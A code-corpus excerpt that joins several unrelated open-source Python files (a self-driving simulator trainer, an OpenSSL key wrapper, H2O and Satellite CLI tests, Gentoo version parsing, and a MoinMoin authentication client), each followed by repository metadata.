self.status.set(status_txt.format(str_mode, str_rating, str_train_text, str_recording, self.speed, self.steering_angle * 25))
def update_timers(self):
"""
Triggered after a mode change or at start.
"""
# Update timers for autonomous mode
if self.mode == 'auto':
self.last_switch_time = time.time()
else:
self.auto_time += time.time() - self.last_switch_time
def keydown(self, event):
if event.char == 'q':
self.root.destroy()
os._exit(0) # Sledgehammer
elif event.char == 'c' or event.char == 'C':
self.reset_steering()
elif event.char == 'x' or event.char == 'X':
if self.mode == 'manual':
self.is_training = False # No training in autonomous mode
self.mode = 'auto'
else:
self.mode = 'manual'
self.update_timers()
elif event.char == 'z' or event.char == 'Z':
# Toggle flag (only in manual mode)
if self.mode == 'manual':
self.is_training = not self.is_training
elif event.char == "r" or event.char == "R":
self.is_recording = not self.is_recording
def speed_control(self, direction):
"""
direction = +1 for increase, -1 for decrease
"""
self.speed += direction * 1
self.speed = max(0, self.speed)
self.speed = min(self.speed_limit, self.speed)
self.update_status()
def update_throttle(self, data):
"""
Implements P-controller for speed
"""
throttle_max = 1.0
throttle_min = -1.0
K = 0.35 # Proportional gain
self.throttle = (self.speed - data['speed']) * K
self.throttle = min(throttle_max, self.throttle)
self.throttle = max(throttle_min, self.throttle)
def update_steering(self, data):
"""
Implements a simple centering torque for the manual steering
"""
if self.mode == 'manual':
if abs(self.steering_angle) < self.centering_torque:
self.steering_angle = 0.0
elif self.steering_angle > 0:
self.steering_angle -= self.centering_torque
elif self.steering_angle < 0:
self.steering_angle += self.centering_torque
def turn(self, direction=None):
"""
direction = +1 for right, -1 for left
"""
self.steering_angle += direction * self.turn_rate / 25.
self.steering_angle = max(self.steering_angle, -self.steering_limit)
self.steering_angle = min(self.steering_angle, +self.steering_limit)
self.update_status()
def reset_steering(self):
self.steering_angle = 0.0
self.update_status()
def preprocess_input(self, img):
''' Crop, resize and convert input image from RGB to HLS colorspace
:param self:
:param img: np array of uint8
:return: preprocessed image
'''
img = cv2.resize(img[60:140, 40:280], (200, 66))
return cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype("float32")
def predict_steering(self, data):
x = self.preprocess_input(data['image'])
x = x[None, :, :, :] # Extend dimension
return float(model.predict(x, batch_size=1))
def save_batch(self, data):
"""
Saves training data in current batch to disk.
"""
# TODO: Implement save_batch()
pass
def train_model(self, model, X_train, y_train):
h = model.fit(X_train, y_train,
nb_epoch=1, verbose=0, batch_size=training_batch_size)
model.save_weights(checkpoint_filename)
print('loss : ', h.history['loss'][-1])
return model
def process_data(self, data):
"""
If current batch is full, train the model, save data and reset cache.
else just save data into batch
"""
img = self.preprocess_input(data['image'])
steering_angle = self.steering_angle
# randomly flip training image horizontally
flip = np.random.choice([True, False])
if flip:
img = cv2.flip(img, 1)
steering_angle = -steering_angle
self.current_X.append(img)
self.current_Y.append(steering_angle)
if len(self.current_Y) == training_batch_size:
X_train = np.array(self.current_X)
y_train = np.array(self.current_Y)
print('Training model ...')
self.train_model(self.model, X_train, y_train)
self.save_batch((X_train, y_train))
# Reset internal batch
self.current_X = []
self.current_Y = []
# Callback functions triggered by ControlServer
def handle_connect(self, sid):
self.start_time = time.time() # Reset timer
self.auto_time = 0.0
self.last_switch_time = None
self.update_timers()
# Focus window when simulator connects
self.focus_gui()
def handle_telemetry(self, data):
if self.mode == 'auto':
self.steering_angle = self.predict_steering(data)
elif self.mode == 'manual':
steering_angle = self.steering_angle
if self.is_training:
self.process_data(data)
if self.is_recording:
# Todo: write to hdf5 store instead
img_filename = "center_"+str(datetime.now()) + '.jpg'
mpimg.imsave(os.path.join(dir_recordings, img_filename),
data["image"].astype("uint8"))
# print(img_filename)
# with pd.HDFStore(hdf_recordings) as hdf_file:
# hdf_file.append()
with open(steering_angle_recordings, "a") as csv_file:
csv_writer = csv.writer(csv_file, delimiter=",")
if not os.path.exists(steering_angle_recordings):
csv_writer.writerow(['center', 'steering'])
csv_writer.writerow([img_filename, self.steering_angle])
# Send current control variables to simulator
self.control_srv.send_control(self.steering_angle, self.throttle)
# Update UI
self.update_status()
# Steering dynamics and speed controller
self.update_steering(data)
self.update_throttle(data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
model = model_from_json(jfile.read())
rmsprop = RMSprop(lr=learning_rate)
model.compile(rmsprop, "mae")
weights_file = args.model.replace('json', 'h5')
if os.path.exists(weights_file):
model.load_weights(weights_file)
if not os.path.exists(dir_recordings):
os.makedirs(dir_recordings)
driver = LiveTrainer(model)
driver.init_gui()
driver.start_server()
| apache-2.0 | 1,367,188,065,342,590,700 | 30.791557 | 133 | 0.592414 | false |
vbwagner/ctypescrypto | ctypescrypto/pkey.py | 1 | 19010 | """
This module provides interface for low-level private/public keypair operation
PKey object of this module is wrapper around OpenSSL EVP_PKEY object.
"""
from ctypes import c_char, c_char_p, c_void_p, c_int, c_long, POINTER
from ctypes import create_string_buffer, byref, memmove, CFUNCTYPE
from ctypescrypto import libcrypto,pyver,bintype,chartype
from ctypescrypto.exception import LibCryptoError, clear_err_stack
from ctypescrypto.bio import Membio
__all__ = ['PKeyError', 'PKey', 'PW_CALLBACK_FUNC']
class PKeyError(LibCryptoError):
""" Exception thrown if libcrypto finctions return an error """
pass
PW_CALLBACK_FUNC = CFUNCTYPE(c_int, POINTER(c_char), c_int, c_int, c_char_p)
""" Function type for pem password callback """
def _password_callback(c):
"""
Converts given user function or string to C password callback
function, passable to openssl.
IF function is passed, it would be called upon reading or writing
PEM format private key with one argument which is True if we are
writing key and should verify passphrase and false if we are reading
"""
if c is None:
return PW_CALLBACK_FUNC(0)
if callable(c):
if pyver ==2 :
def __cb(buf, length, rwflag, userdata):
pwd = c(rwflag)
cnt = min(len(pwd),length)
memmove(buf,pwd, cnt)
return cnt
else:
def __cb(buf, length, rwflag, userdata):
pwd = c(rwflag).encode("utf-8")
cnt = min(len(pwd),length)
memmove(buf,pwd, cnt)
return cnt
else:
if pyver > 2:
c=c.encode("utf-8")
def __cb(buf,length,rwflag,userdata):
cnt=min(len(c),length)
memmove(buf,c,cnt)
return cnt
return PW_CALLBACK_FUNC(__cb)
def _keybio(blob, format):
# But DER string should be binary
if format == "PEM" and isinstance(blob,chartype):
return Membio(blob.encode("ascii"),clone=True)
elif isinstance(blob,bintype):
return Membio(blob)
else:
raise TypeError("Key should be either blob or PEM string")
class PKey(object):
"""
Represents public/private key pair. Wrapper around EVP_PKEY
libcrypto object.
May contain either both private and public key (such objects can be
used for signing, deriving shared key as well as verifying or public
key only, which can be used for verifying or as peer key when
deriving.
@var cansign is true key has private part.
@var key contain pointer to EVP_PKEY and should be passed to various
libcrypto routines
"""
def __init__(self, ptr=None, privkey=None, pubkey=None, format="PEM",
cansign=False, password=None):
"""
PKey object can be created from either private/public key blob or
from C language pointer, returned by some OpenSSL function
Following named arguments are recognized by constructor
privkey - private key blob. If this is specified, format and
password can be also specified
pubkey - public key blob. If this is specified, format can be
specified.
ptr - pointer, returned by openssl function. If it is specified,
cansign should be also specified.
These three arguments are mutually exclusive.
format - can be either 'PEM' or 'DER'. Specifies format of blob.
password - can be string with password for encrypted key, or
callable with one boolean argument, which returns password.
During constructor call this argument would be false.
If key is in PEM format, its encrypted status and format is
autodetected. If key is in DER format, than if password is
specified, key is assumed to be encrypted PKCS8 key otherwise
it is assumed to be unencrypted.
"""
if not ptr is None:
self.key = ptr
self.cansign = cansign
if not privkey is None or not pubkey is None:
raise TypeError("Just one of ptr, pubkey or privkey can " +
"be specified")
elif not privkey is None:
if not pubkey is None:
raise TypeError("Just one of ptr, pubkey or privkey can " +
"be specified")
bio=_keybio(privkey,format)
self.cansign = True
if format == "PEM":
self.key = libcrypto.PEM_read_bio_PrivateKey(bio.bio, None,
_password_callback(password),
None)
else:
if password is not None:
self.key = libcrypto.d2i_PKCS8PrivateKey_bio(bio.bio,None,
_password_callback(password),
None)
else:
self.key = libcrypto.d2i_PrivateKey_bio(bio.bio, None)
if self.key is None:
raise PKeyError("error parsing private key")
elif not pubkey is None:
bio = _keybio(pubkey,format)
self.cansign = False
if format == "PEM":
self.key = libcrypto.PEM_read_bio_PUBKEY(bio.bio, None,
_password_callback(password),
None)
else:
self.key = libcrypto.d2i_PUBKEY_bio(bio.bio, None)
if self.key is None:
raise PKeyError("error parsing public key")
else:
raise TypeError("Neither public, nor private key is specified")
def __del__(self):
""" Frees EVP_PKEY object (note, it is reference counted) """
if hasattr(self,"key"):
libcrypto.EVP_PKEY_free(self.key)
def __eq__(self, other):
""" Compares two public keys. If one has private key and other
doesn't it doesn't affect result of comparation
"""
return libcrypto.EVP_PKEY_cmp(self.key, other.key) == 1
def __ne__(self, other):
""" Compares two public key for not-equality """
return not self.__eq__(other)
def __str__(self):
""" printable representation of public key """
bio = Membio()
libcrypto.EVP_PKEY_print_public(bio.bio, self.key, 0, None)
return str(bio)
def sign(self, digest, **kwargs):
"""
Signs given digest and retirns signature
Keyword arguments allows to set various algorithm-specific
parameters. See pkeyutl(1) manual.
"""
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing sign context")
if libcrypto.EVP_PKEY_sign_init(ctx) < 1:
raise PKeyError("sign_init")
self._configure_context(ctx, kwargs)
# Find out signature size
siglen = c_long(0)
if libcrypto.EVP_PKEY_sign(ctx, None, byref(siglen), digest,
len(digest)) < 1:
raise PKeyError("computing signature length")
sig = create_string_buffer(siglen.value)
if libcrypto.EVP_PKEY_sign(ctx, sig, byref(siglen), digest,
len(digest)) < 1:
raise PKeyError("signing")
libcrypto.EVP_PKEY_CTX_free(ctx)
return sig.raw[:int(siglen.value)]
def verify(self, digest, signature, **kwargs):
"""
Verifies given signature on given digest
Returns True if Ok, False if don't match
Keyword arguments allows to set algorithm-specific
parameters
"""
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing verify context")
if libcrypto.EVP_PKEY_verify_init(ctx) < 1:
raise PKeyError("verify_init")
self._configure_context(ctx, kwargs)
ret = libcrypto.EVP_PKEY_verify(ctx, signature, len(signature), digest,
len(digest))
if ret < 0:
raise PKeyError("Signature verification")
libcrypto.EVP_PKEY_CTX_free(ctx)
return ret > 0
def derive(self, peerkey, **kwargs):
"""
Derives shared key (DH,ECDH,VKO 34.10). Requires
private key available
@param peerkey - other key (may be public only)
Keyword parameters are algorithm-specific
"""
if not self.cansign:
raise ValueError("No private key available")
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing derive context")
if libcrypto.EVP_PKEY_derive_init(ctx) < 1:
raise PKeyError("derive_init")
# This is workaround around missing functionality in GOST engine
# it provides only numeric control command to set UKM, not
# string one.
self._configure_context(ctx, kwargs, ["ukm"])
if libcrypto.EVP_PKEY_derive_set_peer(ctx, peerkey.key) <= 0:
raise PKeyError("Cannot set peer key")
if "ukm" in kwargs:
# We just hardcode numeric command to set UKM here
if libcrypto.EVP_PKEY_CTX_ctrl(ctx, -1, 1 << 10, 8, 8,
kwargs["ukm"]) <= 0:
raise PKeyError("Cannot set UKM")
keylen = c_long(0)
if libcrypto.EVP_PKEY_derive(ctx, None, byref(keylen)) <= 0:
raise PKeyError("computing shared key length")
buf = create_string_buffer(keylen.value)
if libcrypto.EVP_PKEY_derive(ctx, buf, byref(keylen)) <= 0:
raise PKeyError("computing actual shared key")
libcrypto.EVP_PKEY_CTX_free(ctx)
return buf.raw[:int(keylen.value)]
@staticmethod
def generate(algorithm, **kwargs):
"""
Generates new private-public key pair for given algorithm
(string like 'rsa','ec','gost2001') and algorithm-specific
parameters.
Algorithm specific paramteers for RSA:
rsa_keygen_bits=number - size of key to be generated
rsa_keygen_pubexp - RSA public expontent(default 65537)
Algorithm specific parameters for DSA,DH and EC
paramsfrom=PKey object
copy parameters of newly generated key from existing key
Algorithm specific parameters for GOST2001
paramset= paramset name where name is one of
'A','B','C','XA','XB','test'
paramsfrom does work too
"""
tmpeng = c_void_p(None)
if isinstance(algorithm, chartype):
alg = algorithm.encode("ascii")
else:
alg = algorithm
ameth = libcrypto.EVP_PKEY_asn1_find_str(byref(tmpeng), alg, -1)
if ameth is None:
raise PKeyError("Algorithm %s not foind\n"%(algorithm))
clear_err_stack()
pkey_id = c_int(0)
libcrypto.EVP_PKEY_asn1_get0_info(byref(pkey_id), None, None, None,
None, ameth)
#libcrypto.ENGINE_finish(tmpeng)
if "paramsfrom" in kwargs:
ctx = libcrypto.EVP_PKEY_CTX_new(kwargs["paramsfrom"].key, None)
else:
ctx = libcrypto.EVP_PKEY_CTX_new_id(pkey_id, None)
# FIXME support EC curve as keyword param by invoking paramgen
# operation
if ctx is None:
raise PKeyError("Creating context for key type %d"%(pkey_id.value))
if libcrypto.EVP_PKEY_keygen_init(ctx) <= 0:
raise PKeyError("keygen_init")
PKey._configure_context(ctx, kwargs, ["paramsfrom"])
key = c_void_p(None)
if libcrypto.EVP_PKEY_keygen(ctx, byref(key)) <= 0:
raise PKeyError("Error generating key")
libcrypto.EVP_PKEY_CTX_free(ctx)
return PKey(ptr=key, cansign=True)
def exportpub(self, format="PEM"):
"""
Returns public key as PEM or DER structure.
"""
bio = Membio()
if format == "PEM":
retcode = libcrypto.PEM_write_bio_PUBKEY(bio.bio, self.key)
else:
retcode = libcrypto.i2d_PUBKEY_bio(bio.bio, self.key)
if retcode == 0:
raise PKeyError("error serializing public key")
return str(bio)
def exportpriv(self, format="PEM", password=None, cipher=None):
"""
Returns private key as PEM or DER Structure.
If password and cipher are specified, encrypts key
on given password, using given algorithm. Cipher must be
an ctypescrypto.cipher.CipherType object
Password can be either string or function with one argument,
which returns password. It is called with argument True, which
means, that we are encrypting key, and password should be
verified (requested twice from user, for example).
"""
bio = Membio()
if cipher is None:
evp_cipher = None
else:
evp_cipher = cipher.cipher
if format == "PEM":
ret = libcrypto.PEM_write_bio_PrivateKey(bio.bio, self.key,
evp_cipher, None, 0,
_password_callback(password),
None)
if ret ==0:
raise PKeyError("error serializing private key")
return str(bio)
else:
ret = libcrypto.i2d_PKCS8PrivateKey_bio(bio.bio, self.key,
evp_cipher, None, 0,
_password_callback(password),
None)
if ret ==0:
raise PKeyError("error serializing private key")
return bintype(bio)
@staticmethod
def _configure_context(ctx, opts, skip=()):
"""
Configures context of public key operations
@param ctx - context to configure
@param opts - dictionary of options (from kwargs of calling
function)
@param skip - list of options which shouldn't be passed to
context
"""
for oper in opts:
if oper in skip:
continue
if isinstance(oper,chartype):
op = oper.encode("ascii")
else:
op = oper
if isinstance(opts[oper],chartype):
value = opts[oper].encode("ascii")
elif isinstance(opts[oper],bintype):
value = opts[oper]
else:
if pyver == 2:
value = str(opts[oper])
else:
value = str(opts[oper]).encode('ascii')
ret = libcrypto.EVP_PKEY_CTX_ctrl_str(ctx, op, value)
if ret == -2:
raise PKeyError("Parameter %s is not supported by key" % oper)
if ret < 1:
raise PKeyError("Error setting parameter %s" % oper)
# Declare function prototypes
libcrypto.EVP_PKEY_cmp.argtypes = (c_void_p, c_void_p)
libcrypto.PEM_read_bio_PrivateKey.restype = c_void_p
libcrypto.PEM_read_bio_PrivateKey.argtypes = (c_void_p, POINTER(c_void_p),
PW_CALLBACK_FUNC, c_char_p)
libcrypto.PEM_read_bio_PUBKEY.restype = c_void_p
libcrypto.PEM_read_bio_PUBKEY.argtypes = (c_void_p, POINTER(c_void_p),
PW_CALLBACK_FUNC, c_char_p)
libcrypto.d2i_PUBKEY_bio.restype = c_void_p
libcrypto.d2i_PUBKEY_bio.argtypes = (c_void_p, c_void_p)
libcrypto.d2i_PrivateKey_bio.restype = c_void_p
libcrypto.d2i_PrivateKey_bio.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_print_public.argtypes = (c_void_p, c_void_p, c_int, c_void_p)
libcrypto.EVP_PKEY_asn1_find_str.restype = c_void_p
libcrypto.EVP_PKEY_asn1_find_str.argtypes = (c_void_p, c_char_p, c_int)
libcrypto.EVP_PKEY_asn1_get0_info.restype = c_int
libcrypto.EVP_PKEY_asn1_get0_info.argtypes = (POINTER(c_int), POINTER(c_int),
POINTER(c_int), POINTER(c_char_p),
POINTER(c_char_p), c_void_p)
libcrypto.EVP_PKEY_cmp.restype = c_int
libcrypto.EVP_PKEY_cmp.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_ctrl_str.restype = c_int
libcrypto.EVP_PKEY_CTX_ctrl_str.argtypes = (c_void_p, c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_ctrl.restype = c_int
libcrypto.EVP_PKEY_CTX_ctrl.argtypes = (c_void_p, c_int, c_int, c_int, c_int,
c_void_p)
libcrypto.EVP_PKEY_CTX_free.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_CTX_new.restype = c_void_p
libcrypto.EVP_PKEY_CTX_new.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_new_id.restype = c_void_p
libcrypto.EVP_PKEY_CTX_new_id.argtypes = (c_int, c_void_p)
libcrypto.EVP_PKEY_derive.restype = c_int
libcrypto.EVP_PKEY_derive.argtypes = (c_void_p, c_char_p, POINTER(c_long))
libcrypto.EVP_PKEY_derive_init.restype = c_int
libcrypto.EVP_PKEY_derive_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_derive_set_peer.restype = c_int
libcrypto.EVP_PKEY_derive_set_peer.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_free.argtypes = (c_void_p,)
libcrypto.EVP_PKEY_keygen.restype = c_int
libcrypto.EVP_PKEY_keygen.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_keygen_init.restype = c_int
libcrypto.EVP_PKEY_keygen_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_sign.restype = c_int
libcrypto.EVP_PKEY_sign.argtypes = (c_void_p, c_char_p, POINTER(c_long),
c_char_p, c_long)
libcrypto.EVP_PKEY_sign_init.restype = c_int
libcrypto.EVP_PKEY_sign_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_verify.restype = c_int
libcrypto.EVP_PKEY_verify.argtypes = (c_void_p, c_char_p, c_long, c_char_p,
c_long)
libcrypto.EVP_PKEY_verify_init.restype = c_int
libcrypto.EVP_PKEY_verify_init.argtypes = (c_void_p, )
libcrypto.PEM_write_bio_PrivateKey.argtypes = (c_void_p, c_void_p, c_void_p,
c_char_p, c_int,
PW_CALLBACK_FUNC, c_char_p)
libcrypto.PEM_write_bio_PUBKEY.argtypes = (c_void_p, c_void_p)
libcrypto.i2d_PUBKEY_bio.argtypes = (c_void_p, c_void_p)
libcrypto.i2d_PKCS8PrivateKey_bio.argtypes = (c_void_p, c_void_p, c_void_p,
c_char_p, c_int,
PW_CALLBACK_FUNC, c_char_p)
libcrypto.d2i_PKCS8PrivateKey_bio.restype = c_void_p
libcrypto.d2i_PKCS8PrivateKey_bio.argtypes = (c_void_p,c_void_p,
PW_CALLBACK_FUNC,c_void_p)
libcrypto.ENGINE_finish.argtypes = (c_void_p, )
| mit | -4,676,680,321,203,825,000 | 41.33853 | 116 | 0.576907 | false |
bospetersen/h2o-3 | h2o-py/tests/testdir_algos/glm/pyunit_mean_residual_devianceGLM.py | 1 | 1334 | import sys
sys.path.insert(1,"../../../")
import h2o, tests
def glm_mean_residual_deviance(ip,port):
cars = h2o.import_file(path=h2o.locate("smalldata/junit/cars_20mpg.csv"))
s = cars[0].runif()
train = cars[s > 0.2]
valid = cars[s <= 0.2]
predictors = ["displacement","power","weight","acceleration","year"]
response_col = "economy"
glm = h2o.glm(x=train[predictors],
y=train[response_col],
validation_x=valid[predictors],
validation_y=valid[response_col],
nfolds=3)
glm_mrd = glm.mean_residual_deviance(train=True,valid=True,xval=True)
assert isinstance(glm_mrd['train'],float), "Expected training mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['train']))
assert isinstance(glm_mrd['valid'],float), "Expected validation mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['valid']))
assert isinstance(glm_mrd['xval'],float), "Expected cross-validation mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['xval']))
if __name__ == '__main__':
tests.run_test(sys.argv, glm_mean_residual_deviance)
| apache-2.0 | 8,200,899,898,499,487,000 | 48.407407 | 122 | 0.570465 | false |
iksaif/euscan | pym/euscan/version.py | 1 | 3456 | import re
gentoo_unstable = ("alpha", "beta", "pre", "rc")
gentoo_types = ("alpha", "beta", "pre", "rc", "p")
def is_version_type_stable(version_type):
return version_type not in gentoo_unstable
def is_version_stable(version):
return is_version_type_stable(get_version_type(version))
def get_version_type(version):
types = []
if "9999" in version or "99999999" in version:
return "live"
for token in re.findall("[\._-]([a-zA-Z]+)", version):
if token in gentoo_types:
types.append(token)
if types:
return types[0] # TODO: consider returning all types
return "release"
# Stolen from pkg_resources, but importing it is not a good idea
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = \
{'pre': 'c', 'preview': 'c', '-': 'final-', 'rc': 'c', 'dev': '@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*' + part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part < '*final': # remove '-' before a prerelease tag
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
| gpl-2.0 | 5,845,581,522,550,137,000 | 37.831461 | 79 | 0.643229 | false |
ldjebran/robottelo | tests/foreman/cli/test_hammer.py | 2 | 7839 | """Tests related to hammer command and its options and subcommands.
:Requirement: Hammer
:CaseAutomation: Automated
:CaseLevel: Component
:CaseComponent: Hammer
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import json
import re
from fauxfactory import gen_string
from robottelo import ssh
from robottelo.cli import hammer
from robottelo.cli.defaults import Defaults
from robottelo.cli.factory import make_org, make_product
from robottelo.decorators import tier1, upgrade
from robottelo.helpers import is_open, read_data_file
from robottelo.test import CLITestCase
from six import StringIO
HAMMER_COMMANDS = json.loads(read_data_file('hammer_commands.json'))
def _fetch_command_info(command):
"""Fetch command info from expected commands info dictionary."""
info = HAMMER_COMMANDS
if command != 'hammer':
found = []
parts = command.split(' ')[1:] # exclude hammer
for part in parts:
for command in info['subcommands']:
if command['name'] == part:
found.append(part)
info = command
break
if found != parts:
return None
return info
def _format_commands_diff(commands_diff):
"""Format the commands differences into a human readable format."""
output = StringIO()
for key, value in sorted(commands_diff.items()):
if key == 'hammer':
continue
output.write('{}{}\n'.format(
key,
' (new command)' if value['added_command'] else ''
))
if value.get('added_subcommands'):
output.write(' Added subcommands:\n')
for subcommand in value.get('added_subcommands'):
output.write(' * {}\n'.format(subcommand))
if value.get('added_options'):
output.write(' Added options:\n')
for option in value.get('added_options'):
output.write(' * {}\n'.format(option))
if value.get('removed_subcommands'):
output.write(' Removed subcommands:')
for subcommand in value.get('removed_subcommands'):
output.write(' * {}'.format(subcommand))
if value.get('removed_options'):
output.write(' Removed options:\n')
for option in value.get('removed_options'):
output.write(' * {}\n'.format(option))
output.write('\n')
output_value = output.getvalue()
output.close()
return output_value
class HammerCommandsTestCase(CLITestCase):
"""Tests for ensuring that all expected hammer subcommands and its options
are present.
"""
def __init__(self, *args, **kwargs):
super(HammerCommandsTestCase, self).__init__(*args, **kwargs)
self.differences = {}
def _traverse_command_tree(self):
"""Walk through the hammer commands tree and assert that the expected
options are present.
"""
raw_output = ssh.command(
'hammer full-help', output_format='plain').stdout
commands = re.split('.*\n(?=hammer.*\n^[-]+)', raw_output, flags=re.M)
commands.pop(0) # remove "Hammer CLI help" line
for raw_command in commands:
raw_command = raw_command.splitlines()
command = raw_command.pop(0).replace(' >', '')
output = hammer.parse_help(raw_command)
command_options = set([
option['name'] for option in output['options']])
command_subcommands = set(
[subcommand['name'] for subcommand in output['subcommands']]
)
expected = _fetch_command_info(command)
expected_options = set()
expected_subcommands = set()
if expected is not None:
expected_options = set(
[option['name'] for option in expected['options']]
)
expected_subcommands = set([
subcommand['name']
for subcommand in expected['subcommands']
])
if is_open('BZ:1666687'):
cmds = ['hammer report-template create', 'hammer report-template update']
if command in cmds:
command_options.add('interactive')
if 'hammer virt-who-config fetch' in command:
command_options.add('output')
added_options = tuple(command_options - expected_options)
removed_options = tuple(expected_options - command_options)
added_subcommands = tuple(
command_subcommands - expected_subcommands)
removed_subcommands = tuple(
expected_subcommands - command_subcommands)
if (added_options or added_subcommands or removed_options or
removed_subcommands):
diff = {
'added_command': expected is None,
}
if added_options:
diff['added_options'] = added_options
if removed_options:
diff['removed_options'] = removed_options
if added_subcommands:
diff['added_subcommands'] = added_subcommands
if removed_subcommands:
diff['removed_subcommands'] = removed_subcommands
self.differences[command] = diff
@tier1
@upgrade
def test_positive_all_options(self):
"""check all provided options for every hammer command
:id: 1203ab9f-896d-4039-a166-9e2d36925b5b
:expectedresults: All expected options are present
:CaseImportance: Critical
"""
self.maxDiff = None
self._traverse_command_tree()
if self.differences:
self.fail(
'\n' + _format_commands_diff(self.differences)
)
class HammerTestCase(CLITestCase):
"""Tests related to hammer sub options. """
@tier1
@upgrade
def test_positive_disable_hammer_defaults(self):
"""Verify hammer disable defaults command.
:id: d0b65f36-b91f-4f2f-aaf8-8afda3e23708
:steps:
1. Add hammer defaults as organization-id.
2. Verify hammer product list successful.
3. Run hammer --no-use-defaults product list.
:expectedresults: Hammer --no-use-defaults product list should fail.
:CaseImportance: Critical
:BZ: 1640644
"""
default_org = make_org()
default_product_name = gen_string('alpha')
make_product({
u'name': default_product_name,
u'organization-id': default_org['id']
})
try:
Defaults.add({
u'param-name': 'organization_id',
u'param-value': default_org['id'],
})
# Verify --organization-id is not required to pass if defaults are set
result = ssh.command('hammer product list')
self.assertEqual(result.return_code, 0)
# Verify product list fail without using defaults
result = ssh.command('hammer --no-use-defaults product list')
self.assertNotEqual(result.return_code, 0)
self.assertFalse(default_product_name in "".join(result.stdout))
# Verify --organization-id is not required to pass if defaults are set
result = ssh.command('hammer --use-defaults product list')
self.assertEqual(result.return_code, 0)
self.assertTrue(default_product_name in "".join(result.stdout))
finally:
Defaults.delete({u'param-name': 'organization_id'})
result = ssh.command('hammer defaults list')
self.assertTrue(default_org['id'] not in "".join(result.stdout))
| gpl-3.0 | 7,244,868,775,362,183,000 | 35.802817 | 89 | 0.580304 | false |
smilix/TracMoinMoinAuth | tracmoinmoinauth/moinmoin_auth_by_provider.py | 1 | 2634 | # -*- coding: utf-8 -*-
#
# Get the user data from the https://github.com/smilix/moinAuthProvider action.
# Author: [email protected]
import requests
from requests.packages.urllib3 import PoolManager
class MoinMoinAuthByProvider():
def __init__(self, logger, provider_url, psk, ssl_fingerprint, ca_certs, disable_cache):
if provider_url is None or provider_url == "":
raise ValueError('No "provider_url" configuration.')
if psk is None or psk == "":
raise ValueError('No "psk" configuration.')
self._provider_url = provider_url
self._psk = psk
self._ssl_fingerprint = ssl_fingerprint
self._ca_certs = ca_certs
# ToDo: implement
self._disable_cache = disable_cache
self._session = requests.Session()
fingerprint_adapter = _FingerprintAdapter(self._ssl_fingerprint)
self._session.mount("https://", fingerprint_adapter)
def get_users(self):
result = self._make_request("list")
user_list = []
for user in result:
user_list.append(user["login"])
return user_list
def check_password(self, user, password):
result = self._make_request("loginCheck", {
"login": user,
"password": password
})
if result["result"] == "ok":
return True
elif result["result"] == "wrong_password":
return False
else:
return None
def _make_request(self, do_type, json=None):
if not json:
json = {}
url = self._provider_url + "?action=authService&do=" + do_type
resp = self._session.post(url, headers={
"Auth-Token": self._psk
}, json=json, verify=self._ca_certs)
if resp.status_code != 200:
raise StandardError("Unexpected response code %d for '%s'. \nServer response was: %s" % (resp.status_code, url, resp.text))
return resp.json()
# from https://github.com/untitaker/vdirsyncer/blob/9d3a9611b2db2e92f933df30dd98c341a50c6211/vdirsyncer/utils/__init__.py#L198
class _FingerprintAdapter(requests.adapters.HTTPAdapter):
def __init__(self, fingerprint=None, **kwargs):
self.fingerprint = str(fingerprint)
super(_FingerprintAdapter, self).__init__(**kwargs)
def init_poolmanager(self, connections, maxsize, block=False):
self.poolmanager = PoolManager(num_pools=connections,
maxsize=maxsize,
block=block,
assert_fingerprint=self.fingerprint)
| mit | 8,862,389,650,365,923,000 | 34.12 | 135 | 0.595672 | false |
